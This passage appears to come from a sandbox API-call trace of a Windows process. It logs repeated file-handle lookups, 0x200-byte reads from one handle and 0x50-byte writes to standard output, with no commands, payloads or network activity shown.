lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] GetFileType (hFile=0x4c) returned 0x1 [0096.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.335] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.335] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.335] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.336] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] GetFileType (hFile=0x4c) returned 0x1 [0096.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.336] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.336] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.337] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecac*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 
[0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ecfc*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed4c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ed9c*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18edec*, lpNumberOfBytesWritten=0x18de40*=0x50, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] GetFileType (hFile=0x4c) returned 0x1 [0096.337] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.337] WriteFile (in: hFile=0x4c, lpBuffer=0x18ee3c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18de40, lpOverlapped=0x0 | out: lpBuffer=0x18ee3c*, lpNumberOfBytesWritten=0x18de40*=0x20, lpOverlapped=0x0) returned 1 [0096.337] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=1) returned 0x4c [0096.338] GetFileType (hFile=0x4c) returned 0x1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) 
returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.338] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.338] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.338] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, 
lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.339] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.339] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.339] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, 
lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.340] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.340] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.340] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.341] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.341] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.341] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 
[0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.342] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.342] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.342] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.343] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.343] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.343] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, 
